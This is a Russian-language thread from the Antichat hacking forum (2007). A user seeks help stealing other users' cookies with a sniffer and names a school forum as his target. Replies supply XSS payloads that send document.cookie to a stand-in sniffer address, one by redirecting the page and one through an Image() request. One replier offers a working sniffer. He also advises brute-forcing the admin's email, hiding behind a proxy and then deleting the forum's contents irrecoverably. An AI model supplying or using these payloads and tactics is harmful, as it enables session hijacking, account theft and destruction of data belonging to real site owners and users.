Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
вопрос.....не знаю в какую еще тему сунуть |
20.01.2007, 23:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
вопрос.....не знаю в какую еще тему сунуть
на античате.ру есть возможность создать сниффер....у меня вопрос: када я его создаю в графе картинка что нада писать? и как потом заливать сниффер на скажем форум что бы он корректно работал и выдовал мне пакеты пользователей прочитавших страницу с этим сниффером или непосредственно перешедшим на этот сниффер если на него нада переходить?? 
с уважением, психанутый доктор.
З.Ы. вникал где-то часа 2 так и не понял что туда нада сунуть, по идее урл на картинку, но почему-то не сработало.....разъясните пожалуйста, желательно на пальцах чтоб дошло точно и с первого раза, не смотря на то что я довольно опытен в работе со сниферами (на сайте просто он халявный и судя по всему оч хороший должен быть) да и со взломом вообще, хочу просто этот метод опроьовать.....буду бесконечно признателен за помощь 
еще раз с уважением |
|
|
|
20.01.2007, 23:45
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Чтобы сниффер работал, его нужно засовывать в XSS, а про то, что такое XSS, можно прочитать на _http://www.google.com
|
|
|
20.01.2007, 23:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
я читал принцип работы сниффера......там нет решения моей проблемы....щас я хочу понять что нужно писать в графе "Картинка" на сайте античатюру в разделе сниффер.....что такое хсс я знаю.....мне нужно знать как залить сниффер в данном случае через античат
|
|
|
|
21.01.2007, 00:25
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
"Залить" жаваскриптовой командой <script>document.location="снифер"+document. cookie</script>
а на ачате щас вроде нельзя зарегать снифер
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
21.01.2007, 00:31
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Залить снифер? Хм... =)
Снифер он только перехватывает данные, ты его никуда не заливаешь. Но чтобы он перехватывал данные, его нужно уметь внедрить.
Короче находишь CSS и вместо слова alert() пишешь img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie; вот и все.
ЗЫ если срочняк нужен снифер, а он не регится, пиши в ПМ, поделюсь своим, ибо его какой-то дебил заюзал... Короче можно сказать, убили мой снифер =)
|
|
|
|
21.01.2007, 00:35
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Fr-Ron, уязвимость называеца XSS 
Автор читай мой первый ответ...БЛ***!! |
|
|
|
21.01.2007, 00:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
блин....а где найти css на school1304.2bb.ru (движок как и на mybb)
|
|
|
|
21.01.2007, 00:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
хорошо...а как его залить в XSS? на том же форуме? я являюсь тока пользователем и не могу скрипты менять, а соответсвено я могу тока втыкать картинки и ссылки типа нажи "сюда" и перейдет на сайт командами [img]блаблабла[/img] где блаблабла есть урл картинки и [url=блаблабла[/url] где блаблабла собственно адрес сайта? как тада заливать?
|
|
|
|
21.01.2007, 00:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
2 Fr-Ron:
можешь мне сказать ссылку на этот "убитый" сниффер на icq: 271106568 плз?
|
|
|
|
21.01.2007, 00:52
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Fr-Ron, уязвимость называеца XSS
Да ну? Cross Site Scripting это зовется, но чтоб не путать с таблицей стилей, ее обзывают иногда XSS, но оригинальное название - CSS.
crazydoctor
Ууу... Перед mybb потренировался бы получше =) Там баги на лету латают...
Добавил : зачастую проще пробрутить мыльник админский и выслать на него пасс... Только вот забыл я уже где этот мыльник искать, ща попробую найти... Если найду, отпишусь...
...
Еще раз добавил... Че-то не вижу я больше этой фичи... Когда-то на 3бб когда баги искал, было ясно написано "e-mail администратора бла-бла-бла". В конце концов можно у админа и спросить. Но тогда нужно бы не спалиться... Ну там, зарегься через проксю, получи мэйл, вскрой, а потом снеси там все без возможности восстановления =))
Последний раз редактировалось Fr-Ron; 21.01.2007 в 01:52..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
